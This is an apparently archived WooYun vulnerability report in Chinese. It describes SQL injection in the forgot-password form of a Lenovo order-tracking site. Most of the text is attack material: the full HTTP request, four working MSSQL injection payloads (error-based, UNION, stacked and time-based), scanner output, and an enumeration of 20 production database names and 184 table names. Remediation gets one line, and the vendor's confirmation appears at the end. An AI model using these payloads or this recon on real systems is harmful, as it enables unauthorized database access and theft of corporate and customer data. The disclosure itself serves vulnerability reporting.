当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-048450

漏洞标题:联想某海外系统存在SQL注射导致信息泄露

相关厂商:联想

漏洞作者: Mr.leo

提交时间:2014-01-10 10:21

修复时间:2014-02-24 10:22

公开时间:2014-02-24 10:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-01-10: 细节已通知厂商并且等待厂商处理中
2014-01-13: 厂商已经确认,细节仅向厂商公开
2014-01-23: 细节向核心白帽子及相关领域专家公开
2014-02-02: 细节向普通白帽子公开
2014-02-12: 细节向实习白帽子公开
2014-02-24: 细节向公众公开

简要描述:

联想某海外系统存在SQL注射导致信息泄露

详细说明:

站点:
http://lis.lenovo.com/lots/ 联想订单追踪系统
忘记密码处txt_mailid参数没有过滤,导致注射
burp抓包数据
POST http://lis.lenovo.com/lots/forgetpwd.aspx HTTP/1.1
Host: lis.lenovo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://lis.lenovo.com/lots/forgetpwd.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 875
ToolkitScriptManager1_HiddenField=%3B%3BAjaxControlToolkit%2C+Version%3D3.5.40412.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D28f01b0e84b6d53e%3Aen-US%3A1547e793-5b7e-48fe-8490-03a375b13a33%3Ade1feab2%3Af9cec9bc%3Aa67c2700%3Af2c8e708%3A8613aea7%3A3202a5a2%3Aab09e3fe%3A87104b7c%3Abe6fb298%3A720a52bf%3A589eaa30%3A698129cf%3Ae148b24b&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV4dGRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo%2FHhrQHXeU2moKI%3D&__PREVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8ChebSUfC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=%2FwEWCQLrxYz0BgLQr4CuCgLjh8%2BzAgK9o7eoAQLM9PumDwL7g77nDALn6oHDDAKG9P%2FCDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=123%40lenovo.com&ValidatorCalloutExtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit
Place: POST
Parameter: txt_mailid
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus
Payload: ToolkitScriptManager1_HiddenField=;;AjaxControlToolkit, Version=3
.40412.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:1547e793-5b7e
8fe-8490-03a375b13a33:de1feab2:f9cec9bc:a67c2700:f2c8e708:8613aea7:3202a5a2:ab
e3fe:87104b7c:be6fb298:720a52bf:589eaa30:698129cf:e148b24b&__EVENTTARGET=&__EV
TARGUMENT=&__VIEWSTATE=/wEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV
GRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo/HhrQHXeU2moKI=&__
EVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8Cheb
fC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=/wEWCQLrxYz0BgLQr4CuCgLjh8+zAgK9o7eo
LM9PumDwL7g77nDALn6oHDDAKG9P/CDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=
[email protected]' AND 5076=CONVERT(INT,(CHAR(58)+CHAR(100)+CHAR(102)+CHAR(110)+CHA
58)+(SELECT (CASE WHEN (5076=5076) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+
AR(115)+CHAR(113)+CHAR(122)+CHAR(58))) AND 'ROnr'='ROnr&ValidatorCalloutExtend
4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: ToolkitScriptManager1_HiddenField=;;AjaxControlToolkit, Version=3
.40412.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:1547e793-5b7e
8fe-8490-03a375b13a33:de1feab2:f9cec9bc:a67c2700:f2c8e708:8613aea7:3202a5a2:ab
e3fe:87104b7c:be6fb298:720a52bf:589eaa30:698129cf:e148b24b&__EVENTTARGET=&__EV
TARGUMENT=&__VIEWSTATE=/wEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV
GRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo/HhrQHXeU2moKI=&__
EVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8Cheb
fC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=/wEWCQLrxYz0BgLQr4CuCgLjh8+zAgK9o7eo
LM9PumDwL7g77nDALn6oHDDAKG9P/CDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=
[email protected]' UNION ALL SELECT CHAR(58)+CHAR(100)+CHAR(102)+CHAR(110)+CHAR(58)
HAR(79)+CHAR(75)+CHAR(116)+CHAR(122)+CHAR(66)+CHAR(68)+CHAR(117)+CHAR(79)+CHAR
08)+CHAR(110)+CHAR(58)+CHAR(115)+CHAR(113)+CHAR(122)+CHAR(58), NULL, NULL, NUL
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &ValidatorCallou
xtender4_ClientState=&ValidatorCalloutExtender5_ClientState=&btnProceed=Submit
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ToolkitScriptManager1_HiddenField=;;AjaxControlToolkit, Version=3
.40412.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:1547e793-5b7e
8fe-8490-03a375b13a33:de1feab2:f9cec9bc:a67c2700:f2c8e708:8613aea7:3202a5a2:ab
e3fe:87104b7c:be6fb298:720a52bf:589eaa30:698129cf:e148b24b&__EVENTTARGET=&__EV
TARGUMENT=&__VIEWSTATE=/wEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV
GRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo/HhrQHXeU2moKI=&__
EVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8Cheb
fC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=/wEWCQLrxYz0BgLQr4CuCgLjh8+zAgK9o7eo
LM9PumDwL7g77nDALn6oHDDAKG9P/CDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=
[email protected]'; WAITFOR DELAY '0:0:5';--&ValidatorCalloutExtender4_ClientState=
alidatorCalloutExtender5_ClientState=&btnProceed=Submit
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ToolkitScriptManager1_HiddenField=;;AjaxControlToolkit, Version=3
.40412.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:1547e793-5b7e
8fe-8490-03a375b13a33:de1feab2:f9cec9bc:a67c2700:f2c8e708:8613aea7:3202a5a2:ab
e3fe:87104b7c:be6fb298:720a52bf:589eaa30:698129cf:e148b24b&__EVENTTARGET=&__EV
TARGUMENT=&__VIEWSTATE=/wEPDwUJLTM2MzQ3Mjk3D2QWAgIDD2QWBAIJD2QWAgIDDw8WAh4EVGV
GRkZAILDw8WAh8ABRMgTEVOT1ZPIC0gTE9UUyAyMDE0ZGRkyOGqREnpj4DYo/HhrQHXeU2moKI=&__
EVIOUSPAGE=gBpNgH6ynAXH4i4vNqTeUNvgeJ-FK81AyW70RcR6_d1JkuMy-xBogFEpLhVCIT8Cheb
fC3yNtkye0Y01JBuyk20UU1&__EVENTVALIDATION=/wEWCQLrxYz0BgLQr4CuCgLjh8+zAgK9o7eo
LM9PumDwL7g77nDALn6oHDDAKG9P/CDALe7ueLCJeTO94BclplgezpolDXt9l9kZr3&txt_mailid=
[email protected]' WAITFOR DELAY '0:0:5'--&ValidatorCalloutExtender4_ClientState=&V
idatorCalloutExtender5_ClientState=&btnProceed=Submit
---
[10:08:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[10:08:39] [INFO] fetching current user
current user: 'lisuser'
[10:08:39] [INFO] fetching current database
current database: 'Lenovo-LIS-India'
[10:08:39] [INFO] fetching database names
[10:08:39] [INFO] the SQL query used returns 20 entries
[10:08:39] [INFO] resumed: "Lenovo-B2B-ANZ"
[10:08:39] [INFO] resumed: "Lenovo-B2B-Asean"
[10:08:39] [INFO] resumed: "Lenovo-B2B-India"
[10:08:39] [INFO] resumed: "Lenovo-Claims-India"
[10:08:39] [INFO] resumed: "Lenovo-CRM-ANZ"
[10:08:39] [INFO] resumed: "Lenovo-CRM-Asean"
[10:08:39] [INFO] resumed: "Lenovo-Crm-India"
[10:08:39] [INFO] resumed: "Lenovo-DISK11-India"
[10:08:39] [INFO] resumed: "Lenovo-GSC-India"
[10:08:39] [INFO] resumed: "Lenovo-GSC-India-VAS"
[10:08:39] [INFO] resumed: "Lenovo-LIS-India"
[10:08:39] [INFO] resumed: "Lenovo-Marketing-India"
[10:08:39] [INFO] resumed: "Lenovo-REL-Pricing-India"
[10:08:39] [INFO] resumed: "Lenovo-SMB-Pricing-India"
[10:08:39] [INFO] resumed: "master"
[10:08:39] [INFO] resumed: "model"
[10:08:39] [INFO] resumed: "msdb"
[10:08:39] [INFO] resumed: "ReportServer"
[10:08:39] [INFO] resumed: "ReportServerTempDB"
[10:08:39] [INFO] resumed: "tempdb"
available databases [20]:
[*] Lenovo-B2B-ANZ
[*] Lenovo-B2B-Asean
[*] Lenovo-B2B-India
[*] Lenovo-Claims-India
[*] Lenovo-CRM-ANZ
[*] Lenovo-CRM-Asean
[*] Lenovo-Crm-India
[*] Lenovo-DISK11-India
[*] Lenovo-GSC-India
[*] Lenovo-GSC-India-VAS
[*] Lenovo-LIS-India
[*] Lenovo-Marketing-India
[*] Lenovo-REL-Pricing-India
[*] Lenovo-SMB-Pricing-India
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: [Lenovo-LIS-India]
[184 tables]
+------------------------------------------------+
| dbo.AUDIT_LOG_DATA |
| dbo.AUDIT_LOG_TRANSACTIONS |
| dbo.AUDIT_UNDO |
| dbo.AUDIT_VIEW |
| dbo.[Jana.DB_V_Plant_Code] |
| dbo.[Jana.ECC_File_Det] |
| dbo.[Jana.LV_Activity] |
| dbo.[Jana.LV_LIS_ADD_SAP_UPLOAD] |
| dbo.[Jana.LV_LOTS_PSD_PARTSHIMENT] |
| dbo.[Jana.LV_LOTS_PSD_VS_BILLED] |
| dbo.[Jana.LV_REL_BILLING] |
| dbo.[Jana.LV_STO_REPORT] |
| dbo.[Jana.LV_TOP100CUSTOMER] |
| dbo.[Jana.LV_TOP100CUSTOMER_OLD] |
| dbo.[Jana.Sapinvoice_Auto_Upload] |
| dbo.[Jana.V_InvBillInfo] |
| dbo.[Jana.V_PSD_LIS] |
| dbo.[Jana.V_billinfo] |
| dbo.[Jana.lm_alert] |
| dbo.[Jana.lm_alerthierarchy] |
| dbo.[Jana.lm_broadcast] |
| dbo.[Jana.lm_carrieraccess] |
| dbo.[Jana.lm_city] |
| dbo.[Jana.lm_cityaccess] |
| dbo.[Jana.lm_contract] |
| dbo.[Jana.lm_controlfile] |
| dbo.[Jana.lm_cost_matrix] |
| dbo.[Jana.lm_custgroupchannel] |
| dbo.[Jana.lm_customeraccess] |
| dbo.[Jana.lm_custtypeaccess] |
| dbo.[Jana.lm_detentionreason] |
| dbo.[Jana.lm_distance] |
| dbo.[Jana.lm_documentaccess] |
| dbo.[Jana.lm_documentmanager] |
| dbo.[Jana.lm_duty] |
| dbo.[Jana.lm_escalation] |
| dbo.[Jana.lm_escalation_old] |
| dbo.[Jana.lm_escalationhierarchy] |
| dbo.[Jana.lm_escalationhierarchy_old] |
| dbo.[Jana.lm_function] |
| dbo.[Jana.lm_functionaccess] |
| dbo.[Jana.lm_gscreport] |
| dbo.[Jana.lm_holiday] |
| dbo.[Jana.lm_lock] |
| dbo.[Jana.lm_loggeduser] |
| dbo.[Jana.lm_menuaccess] |
| dbo.[Jana.lm_motrate] |
| dbo.[Jana.lm_parameter] |
| dbo.[Jana.lm_parametercategory] |
| dbo.[Jana.lm_plant] |
| dbo.[Jana.lm_preshipmentalert] |
| dbo.[Jana.lm_region] |
| dbo.[Jana.lm_regionaccess] |
| dbo.[Jana.lm_spacevariable] |
| dbo.[Jana.lm_user] |
| dbo.[Jana.lm_usergroup] |
| dbo.[Jana.lm_whaccess] |
| dbo.[Jana.lm_whcontact] |
| dbo.[Jana.lm_workingtime] |
| dbo.[Jana.ls_V_Report_SapVSDSR] |
| dbo.[Jana.lt_IOD] |
| dbo.[Jana.lt_IOD_BACKUP] |
| dbo.[Jana.lt_Pod_Link] |
| dbo.[Jana.lt_Top100CustomerList] |
| dbo.[Jana.lt_alertoutbound] |
| dbo.[Jana.lt_capex] |
| dbo.[Jana.lt_capexhistory] |
| dbo.[Jana.lt_dsr] |
| dbo.[Jana.lt_dsr_TSP] |
| dbo.[Jana.lt_dsr_TSP_HIS] |
| dbo.[Jana.lt_dsr_TSP_New] |
| dbo.[Jana.lt_dsrhistory] |
| dbo.[Jana.lt_grn] |
| dbo.[Jana.lt_grnhistory] |
| dbo.[Jana.lt_grnhistory_old] |
| dbo.[Jana.lt_incident] |
| dbo.[Jana.lt_motcr] |
| dbo.[Jana.lt_outbound] |
| dbo.[Jana.lt_permit] |
| dbo.[Jana.lt_podextractlog] |
| dbo.[Jana.lt_query] |
| dbo.[Jana.lt_sapinvoice] |
| dbo.[Jana.lt_sapinvoice_RSO] |
| dbo.[Jana.lt_sapinvoice_complete] |
| dbo.[Jana.lt_sapinvoice_complete_old] |
| dbo.[Jana.lt_sapinvoice_test] |
| dbo.[Jana.lt_sapinvoicehistory] |
| dbo.[Jana.lt_sapinvoicehistory_old] |
| dbo.[Jana.lt_stn] |
| dbo.[Jana.lt_supplierpayment] |
| dbo.[Jana.lt_supplierpaymenthistory] |
| dbo.[Jana.lt_upload] |
| dbo.[Jana.lt_uploadlog] |
| dbo.[Jana.lt_warehouse] |
| dbo.[Jana.lt_whspace] |
| dbo.[Jana.lv_DSR_Report1] |
| dbo.[Jana.lv_DSR_Report] |
| dbo.[Jana.lv_TSP_operation_Rpt] |
| dbo.[Jana.lv_TSP_operation_Rpt_Old] |
| dbo.[Jana.lv_carrier] |
| dbo.[Jana.lv_channel] |
| dbo.[Jana.lv_custgroup] |
| dbo.[Jana.lv_customer] |
| dbo.[Jana.lv_delstatus] |
| dbo.[Jana.lv_detentionreason] |
| dbo.[Jana.lv_dsr_vs_tsp_new] |
| dbo.[Jana.lv_dtatfailurecode] |
| dbo.[Jana.lv_endcustomer] |
| dbo.[Jana.lv_functions] |
| dbo.[Jana.lv_lis_ADD_upload] |
| dbo.[Jana.lv_mdtatfailurecode] |
| dbo.[Jana.lv_mot] |
| dbo.[Jana.lv_motcrstatus] |
| dbo.[Jana.lv_operation_Rpt] |
| dbo.[Jana.lv_otreason] |
| dbo.[Jana.lv_plant] |
| dbo.[Jana.lv_pod_vs_tsp] |
| dbo.[Jana.lv_pod_vs_tsp_new] |
| dbo.[Jana.lv_podfailurecode] |
| dbo.[Jana.lv_podperf] |
| dbo.[Jana.lv_podpref] |
| dbo.[Jana.lv_query] |
| dbo.[Jana.lv_rejectionreason] |
| dbo.[Jana.lv_shipcondition] |
| dbo.[Jana.lv_shippingcondition] |
| dbo.[Jana.lv_systemlock] |
| dbo.[Jana.lv_vendor] |
| dbo.[Jana.lv_warehouse] |
| dbo.[Jana.lv_workdaytype] |
| dbo.[Jana.lv_zone] |
| dbo.[Jana.new_view] |
| dbo.[Jana.sapvsdsr] |
| dbo.[Jana.temp_Desktop] |
| dbo.[Jana.temp_Net] |
| dbo.[Jana.temp_NoteBook] |
| dbo.[Jana.test] |
| dbo.[REALBASE-DB\\nasurudheen.ACCESS_CONTROL] |
| dbo.[REALBASE-DB\\nasurudheen.BKBL_RECP_Group] |
| dbo.[REALBASE-DB\\nasurudheen.BackLog] |
| dbo.[REALBASE-DB\\nasurudheen.Billing] |
| dbo.[REALBASE-DB\\nasurudheen.Cust_Info] |
| dbo.[REALBASE-DB\\nasurudheen.HBackLog] |
| dbo.[REALBASE-DB\\nasurudheen.HBilling] |
| dbo.[lisuser.R_Cust_Master] |
| dbo.[lisuser.ZPL_LABLE_TMPL] |
| dbo.[lisweb.AID_Counter] |
| dbo.[lisweb.LV_APPROVAL_LOG] |
| dbo.[lisweb.R_Access_Ctrl] |
| dbo.[lisweb.R_City] |
| dbo.[lisweb.R_Cust_RET_Item] |
| dbo.[lisweb.R_Cust_RTS_Details] |
| dbo.[lisweb.R_Delegation_Log] |
| dbo.[lisweb.R_Delegation_Profile] |
| dbo.[lisweb.R_File_Det] |
| dbo.[lisweb.R_PLANT_CODE] |
| dbo.[lisweb.R_Ret_Type_Master] |
| dbo.[lisweb.R_Return_Detail] |
| dbo.[lisweb.R_Return_Flow] |
| dbo.[lisweb.R_Return_Item] |
| dbo.[lisweb.R_Return_Item_oldBackup] |
| dbo.[lisweb.R_Signup_User] |
| dbo.[lisweb.R_WH_Recv_Profile] |
| dbo.[lisweb.R_Workflow_Profile] |
| dbo.[lisweb.Sap_Billed_Data] |
| dbo.[lisweb.V1_CUST_Return_Qty_Check] |
| dbo.[lisweb.V1_CUST_Return_Qty_Det] |
| dbo.[lisweb.V1_TSP_Return_Qty_Check] |
| dbo.[lisweb.V1_TSP_Return_Qty_Det] |
| dbo.[lisweb.V_Cust_VS_TSP_REPORT] |
| dbo.[lisweb.V_SAP_BILLED_DATA] |
| dbo.[lisweb.V_SAP_DISTINCT_COUNT] |
| dbo.[lisweb.V_TSP_VS_RETDET_Report] |
| dbo.[lisweb.v1_customer_request] |
| dbo.[lisweb.v_customer_Request] |
| dbo.[lisweb.v_customer_request1] |
| dbo.[lisweb.v_customer_request_RPT] |
| dbo.[reluser.MASTER_DATA_RPT] |
| dbo.[reluser.V_Master_Det] |
| dbo.[reluser.access_control] |
| dbo.[reluser.log_table] |
| dbo.[reluser.modp_cus_inv] |
| dbo.[reluser.modp_cus_inv_item] |
| dbo.[reluser.status_board] |
| dbo.sysdiagrams |
+------------------------------------------------+
over

漏洞证明:

已经证明

修复方案:

过滤参数

版权声明:转载请注明来源 Mr.leo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-01-13 13:57

厂商回复:

感谢您对联想信息安全工作的支持 我们会尽快修复漏洞

最新状态:

暂无